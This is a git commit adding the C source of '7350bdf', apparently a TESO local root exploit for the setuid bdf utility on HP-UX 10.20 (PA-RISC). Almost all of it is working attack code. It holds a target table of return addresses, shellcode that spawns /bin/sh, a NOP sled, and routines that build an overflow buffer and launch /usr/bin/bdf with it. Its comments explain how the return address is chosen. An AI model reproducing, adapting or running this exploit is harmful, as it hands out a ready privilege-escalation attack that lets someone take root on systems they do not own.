From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001
From: Root THC
Date: Tue, 24 Feb 2026 12:42:47 +0000
Subject: initial
---
 exploits/7350bdf/7350bdf.c | 201 +++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 201 insertions(+)
 create mode 100644 exploits/7350bdf/7350bdf.c
(limited to 'exploits/7350bdf')
diff --git a/exploits/7350bdf/7350bdf.c b/exploits/7350bdf/7350bdf.c
new file mode 100644
index 0000000..144214b
--- /dev/null
+++ b/exploits/7350bdf/7350bdf.c
@@ -0,0 +1,201 @@
+/* 7350bdf - hppa/hpux bdf local root exploit
+ *
+ * TESO CONFIDENTIAL - SOURCE MATERIALS
+ *
+ * This is unpublished proprietary source code of TESO Security.
+ *
+ * The contents of these coded instructions, statements and computer
+ * programs may not be disclosed to third parties, copied or duplicated in
+ * any form, in whole or in part, without the prior written permission of
+ * TESO Security. This includes especially the Bugtraq mailing list, the
+ * www.hack.co.za, PacketStorm Security and SecuriTeam websites and any public
+ * exploit archive.
+ *
+ * (C) COPYRIGHT TESO Security, 2001
+ * All Rights Reserved
+ *
+ *****************************************************************************
+ * found by scut 2001/08/21, yah yah i know its old
+ * kudos to caddis for enlightning me about quadrants
+ *
+ */
+
+#define VERSION "0.0.1"
+
+#include 
+#include 
+#include 
+
+
+void usage (char *progname);
+
+
+typedef struct {
+ char * desc;
+ int bsize; /* overall buffer size */
+ int align;
+
+ /* the return address has to
+ *
+ * a) lie within the shared library quadrant (within libc)
+ * b) point to some code snippet that looks like this:
+ *
+ * 0xc0108ea8: ldw -18(sr0,sp),rp
+ * 0xc0108eac: ldsid (sr0,rp),r1
+ * 0xc0108eb0: mtsp r1,sr0
+ * 0xc0108eb4: be,n 0(sr0,rp)
+ *
+ * this sets the space id accordingly, so we can return into
+ * the stack
+ */
+ int ret_pos;
+ unsigned int ret_addr;
+
+ /* this is the address our code lies at, and the position where to
+ * put it
+ */
+ int code_pos;
+ unsigned int code_addr;
+
+ /* at least HP-UX 10.20 needs a sane value at a place, which i
+ * happened to call r15_val, since it is passed through %r15
+ */
+ int r15_pos;
+ unsigned int r15_val;
+} t_elem;
+
+t_elem targets[] = {
+ /* tested on: HP-UX calina B.10.20 A 9000/735 -sc */
+ { "HP-UX 10.20", 1200, 3, 1196, 0xc0108ea8,
+ 1192, 0x7b03a220, 1040, 0x7b03a4f8 },
+
+ { NULL, 0, 0, 0, 0, 0 },
+};
+
+
+/* LSD shellcode, thanks buddies */
+unsigned char nop[] =
+ "\x0b\x39\x02\x99"; /* xor %r25,%r25,%r25 */
+
+unsigned char shellcode[] =
+ "\x0b\x5a\x02\x9a" /* xor %r26,%r26,%r26 */
+ "\x0b\x39\x02\x99" /* xor %r25,%r25,%r25 */
+ "\x0b\x18\x02\x98" /* xor %r24,%r24,%r24 */
+ "\x20\x20\x08\x01" /* ldil L%0xc0000004,%r1 */
+ "\xe4\x20\xe0\x08" /* ble R%0xc0000004(%sr7,%r1) */
+ "\xb4\x16\x70\xfc" /* addi,> 0x7e,%r0,%r22 */
+
+ "\xeb\x5f\x1f\xfd" /* bl ,%r26 */
+ "\x0b\x39\x02\x99" /* xor %r25,%r25,%r25 */
+ "\xb7\x5a\x40\x22" /* addi,< 0x11,%r26,%r26 */
+ "\x0f\x40\x12\x0e" /* stbs %r0,7(%r26) */
+ "\x20\x20\x08\x01" /* ldil L%0xc0000004,%r1 */
+ "\xe4\x20\xe0\x08" /* ble R%0xc0000004(%sr7,%r1) */
+ "\xb4\x16\x70\x16" /* addi,> 0xb,%r0,%r22 */
+ "/bin/shA";
+
+
+void
+usage (char *progname)
+{
+ fprintf (stderr, "usage: %s [-t ]\n\n", progname);
+ fprintf (stderr, "-t num\tchoose target (0 for list)\n\n");
+
+ exit (EXIT_FAILURE);
+}
+
+
+int
+main (int argc, char *argv[])
+{
+ char c;
+ int b_walker;
+ unsigned int * iptr;
+ unsigned char buf[2048];
+
+ char * n_argv[3];
+ char * n_env[1];
+
+ int tgt_num = -1;
+ t_elem * tgt;
+
+
+ printf ("7350bdf - hppa/hpux bdf local root exploit\n"
+ "-scut\n\n");
+
+ while ((c = getopt (argc, argv, "t:")) != EOF) {
+ switch (c) {
+ case 't':
+ tgt_num = atoi (optarg);
+ break;
+ default:
+ usage (argv[0]);
+ break;
+ }
+ }
+
+ if (tgt_num < 0)
+ usage (argv[0]);
+
+ if (tgt_num == 0) {
+ printf ("num . 
description\n");
+ printf ("----+--------------------------------\n");
+
+ for ( ; targets[tgt_num].desc != NULL ; ++tgt_num)
+ printf ("%3d | %s\n", tgt_num + 1,
+ targets[tgt_num].desc);
+
+ printf (" '\n");
+
+ exit (EXIT_SUCCESS);
+ }
+
+ if (tgt_num >= (sizeof (targets) / sizeof (t_elem)))
+ usage (argv[0]);
+
+ tgt = &targets[tgt_num - 1];
+ printf ("using: %s\n", tgt->desc);
+
+ memset (buf, '\0', sizeof (buf));
+
+ /* set nops */
+ if (tgt->align != 0)
+ memset (buf, 'A', tgt->align);
+
+ for (b_walker = tgt->align ; b_walker < (tgt->bsize - tgt->align) ;
+ b_walker += 4)
+ {
+ buf[b_walker] = nop[0];
+ buf[b_walker + 1] = nop[1];
+ buf[b_walker + 2] = nop[2];
+ buf[b_walker + 3] = nop[3];
+ }
+
+ if (tgt->r15_pos != 0) {
+ iptr = (unsigned int *) &buf[tgt->r15_pos];
+
+ *iptr = tgt->r15_val; /* sane %r15 */
+ }
+
+ iptr = (unsigned int *) &buf[tgt->code_pos];
+ *iptr = tgt->code_addr; /* real retaddr */
+
+ iptr = (unsigned int *) &buf[tgt->ret_pos];
+ *iptr = tgt->ret_addr; /* yay! */
+
+ /* we assume the buffer is 1024 bytes long */
+ memcpy (&buf[1023] - strlen (shellcode), shellcode,
+ strlen (shellcode));
+
+ buf[tgt->bsize] = '\0';
+
+ n_argv[0] = "/usr/bin/bdf";
+ n_argv[1] = buf;
+ n_env[0] = NULL;
+
+ execve (n_argv[0], n_argv, n_env);
+
+ exit (EXIT_FAILURE);
+}
+
+
-- cgit v1.3